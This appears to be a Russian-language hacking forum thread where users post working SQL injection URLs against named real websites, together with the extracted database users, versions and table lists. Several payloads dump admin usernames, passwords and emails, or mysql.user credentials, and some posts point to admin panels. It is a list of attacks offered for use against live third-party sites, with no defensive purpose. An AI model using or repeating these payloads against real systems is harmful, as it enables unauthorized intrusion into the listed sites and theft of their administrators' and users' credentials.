Code: http://profremont.com.ua/advices.php?article=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3-- Username: [email protected] Database: profremon_base Version: 5.0.51a-log Code: http://www.vanillamusic.gr/index.php?module=content&action=article&id=-1+union+select+user(),2-- Username: vmusic@localhost Database: vanillamusic_gr Version: 4.0.26 Вывод в заголовке. Code: http://www.savatouristik.ru/index.php?mid_open=7&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())-- Username: client304@localhost Database: savatour Version: 4.0.27 Code: http://www.downhill911.com/actualite-vtt-express.php?n=824+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9-- Username: Root@localhost Database: lmorillon Version: 4.0.12-max-debug
PR: 5 5.0.81-log [email protected] Code: http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,group_concat%28username%29,3,group_concat%28password%29+from+admin%20-- админкЭ http://www.downtowncrossing.org/admin
Host Information Server = Apache Version = 5.0.70-debug-log Powered by = PHP/5.2.12-pl0-gentoo Attack Type = SQL Union Injection Current User = h_bolt_ru@localhost Current Database = bolt_ru Supports Union = yes Union Columns = 17 Url| http://www.bolt.ru/cl2.php?metcod=1034 Vuln: http://www.bolt.ru/cl2.php?metcod=1034+and+1=0+ Union Select 1 ,2,3,4,5,6,7,8, UNHEX(HEX([visible])) ,10,11,12,13,14,15,16,17 Comment: -- Visible Column: 9 Hexed: True Cookie: Keyword: Param: Database:bolt_ru information_schema bolt_ru Tables: 555 L 555 E DIN 125 A DIN 125 A2 DIN 1480 DIN 1481 DIN 1587 A2 DIN 2093 DIN 316 DIN 426 A DIN 439 A2 DIN 444 DIN 471 (ГОСТ 13942-86) DIN 471 (нормальный тип) DIN 471 (тЯжелый тип) DIN 472 (нормальный тип) DIN 472 (тЯжелый тип) DIN 472 ГОСТ 13943 DIN 530 A DIN 538 A DIN 555 A DIN 555 C DIN 556 A DIN 562 DIN 564 A DIN 567A DIN 571 DIN 571A DIN 580 A2 DIN 582 DIN 603 DIN 616A DIN 622A DIN 6331 DIN 6334 DIN 6797 DIN 6798 DIN 6799 DIN 6915 DIN 6916 DIN 6923 DIN 7500 M (ГОСТ 11650) DIN 7976 DIN 7980 A2 DIN 7981 Z A2 DIN 7981 DIN 7982 Z A2 DIN 7982 DIN 7985 Z A2 DIN 7985 DIN 9021 A2 DIN 9021 DIN 912 A2 DIN 912 DIN 913 DIN 914 A2 DIN 914 DIN 915 A2 DIN 915 DIN 916 A2 DIN 916 DIN 931 DIN 933 A2 DIN 933 DIN 934 A2 DIN 934 DIN 937 DIN 94 DIN 95 DIN 963 A2 DIN 963 DIN 964 DIN 965 Z A2 DIN 965 DIN 966 DIN 967 DIN 975 A2 DIN 975 DIN 976 DIN 982 DIN 985 A2 DIN 985 ISO 7380 Pozi Tesr Din 2 Test Din anons assortiment catpage grps massy met_sys_vars news phpbb_acl_groups phpbb_acl_options phpbb_acl_roles phpbb_acl_roles_data phpbb_acl_users phpbb_attachments phpbb_banlist phpbb_bbcodes phpbb_bookmarks phpbb_bots phpbb_config phpbb_confirm phpbb_disallow phpbb_drafts phpbb_extension_groups phpbb_extensions phpbb_forums phpbb_forums_access phpbb_forums_track phpbb_forums_watch phpbb_groups phpbb_icons phpbb_lang phpbb_log phpbb_moderator_cache phpbb_modules phpbb_poll_options phpbb_poll_votes phpbb_posts phpbb_privmsgs phpbb_privmsgs_folder phpbb_privmsgs_rules phpbb_privmsgs_to phpbb_profile_fields phpbb_profile_fields_data phpbb_profile_fields_lang phpbb_profile_lang phpbb_ranks phpbb_reports phpbb_reports_reasons phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_sessions_keys phpbb_sitelist phpbb_smilies phpbb_styles phpbb_styles_imageset phpbb_styles_imageset_data phpbb_styles_template phpbb_styles_template_data phpbb_styles_theme phpbb_topics phpbb_topics_posted phpbb_topics_track phpbb_topics_watch phpbb_user_group phpbb_users phpbb_warnings phpbb_words phpbb_zebra pictbl prt prt2 prt3 tovkw tovkw2 ВытЯжнаЯ в потай ВытЯжнаЯ с буртиком ГОСТ 10299-80 ГОСТ 10300-80 ГОСТ 10605-94 ГОСТ 11371-78 исп 1 кл А ГОСТ 11371-78 исп 1 кл С ГОСТ 11371-78 исп 2 ГОСТ 1144-80 ГОСТ 1145-80 ГОСТ 1146-80 ГОСТ 11530-76 ГОСТ 11532-76 ГОСТ 11674-75 ГОСТ 11738-84 ГОСТ 11860-85 исп 1 ГОСТ 11860-85 исп 2 ГОСТ 1491-80 ГОСТ 17473-80 ГОСТ 17474-80 ГОСТ 17475-80=DIN 7991 ГОСТ 22042-76 исп 1 ГОСТ 22353-77 ГОСТ 22354-77 ГОСТ 22355-77 ГОСТ 3032-76 ГОСТ 397-79 ГОСТ 4028-63 ГОСТ 4029-63 ГОСТ 4751-73 (DIN 580) ГОСТ 5915-70 ГОСТ 5918-73 исп 1 ГОСТ 5918-73 исп 2 ГОСТ 5929-70 ГОСТ 6402-70 лег ГОСТ 6402-70 норм ГОСТ 6402-70 тжл ГОСТ 6958-78 кл А ГОСТ 6958-78 кл С ГОСТ 7786-81 ГОСТ 7795-70 ГОСТ 7796-70 ГОСТ 7798-70 ГОСТ 7801-81 ГОСТ 7802-81 ГОСТ 7805-70 ГОСТ 7808-70 ГОСТ 799-73 ГОСТ 809-71 ГОСТ 8144-73 ГОСТ 9064-75 Конфирмат Саморез по гипсокартону Саморез Шуруп потай, универсальный (пози) Columns: Table
Code: http://www.globalideasbank.org/site/store/detail.php?articleId=43+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19+LIMIT+1,1-- Username: gib_db@localhost Database: gib_db Version: 5.0.89-community
Code: http://zdrave.bg/popup.php?c=n&id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4-- Username: rossen_tiabg@localhost Database: rossen_zdrave Version: 5.0.86
Code: http://subaru-club.org/article.asp?ID=161+OR+161=(select%20db_name())&TopicArea=1&ParentID=1 Database: subaru-club Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
Code: _http://www.jewstars.co.cc/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ Code: _http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ Code: _http://ottava.info/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ Code: _http://rap-dvor.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ Code: _http://6mobil.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ /admin.php
Code: http://www.michaelkenna.net/gallery.php?id=2 Host IP: 69.89.18.101 Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635 Powered-by: PHP/5.2.13 DB Server: MySQL unknown ver Current DB: michafj0_mkenna HTML: Target: http://www.fairfieldcountylook.com/gallery.php?id=161 Host IP: 74.208.32.200 Web Server: Apache Powered-by: PHP/4.4.9 DB Server: MySQL >=5 Current DB: db258333454
Code: http://www.itest.ru/samoactual.php?qnum=-1+union+select+user(),version(),database()-- Username: sociolove@localhost Database: sociolove Version: 5.0.26-log Таблицы не выводит, стоит какая-то защита. KENTov, в теме нельзя выкладывать инъекции вида "site.ru/index.php?id=1", найди хотя бы количество колонок. Пример SQL: Code: http://www.michaelkenna.net/gallery.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--
PHP: Target: http://www.snis.ch/news.php?ID=15 Host IP: 84.16.92.9 Web Server: Apache DB Server: MySQL >=5 Current DB: swissinternationalstudiesch
PHP: _http://www.luxury-auction.org.ua/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ /admin.php
Code: http://www.diplom-service.ru/ds.php?id=-1+union+Select+version()-- Code: http://www.haradagr-dp.co.jp/ds.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13-- Code: http://www.bsp-abogados.com/noticias/index-de.php?id=-1+union+select+version()-- Code: http://www.visionodontologia.com.br/dr.php?id=1&pagina=1%27+union+select+1,2,3,passwd,5,6,7,8,9+from+users/* Code: http://rolandos-cars-corfu.com/room-order-du.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11+users-- Code: http://www.propuestasturismo.com.ar/dd.php?id=-4+union+select+1,2,3,4,5,6,7,version()--
http://www.arts-et-metiers.net/musee.php?P=214&id=278+and+1=0+union+select+1,2,3,4,concat(user,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user-- user() : webuser@localhost version() : 5.0.44-log database() : cnam2007
Шоп + админка ничего интересного админка /admin HTML: http://www.offroadbikepartsonline.com.au/detail.php?prod_id=-32%27+union+select+1,2,3,4,5,6,7,8,9,group_concat(version(),0x3a,user(),0x3a,database()+separator+0x0),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&cat_id=15
Code: http://www.lyricsprovider.com/song.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7-- Username: lyricsprovider@localhost Database: lyricsprovider Version: 5.0.45 Таблицы: Code: ads_admin_session ads_adposition ads_banner ads_banzone ads_stats ads_user ads_zone album_lyrics albums artist_links artists counter flash_access flash_poll guest_lyrics guests lyric_details lyric_discus lyric_quality_rate lyric_send lyric_urls lyrics mb_replies partners stats stats_reset titles top20usa top40 updates
Code: http://content.tcc.fl.edu/contacts/show.asp?type=area&id=19+or+1=%28select+top+1+table_name+from+information_schema.tables%29+--+ Моя первая mssql
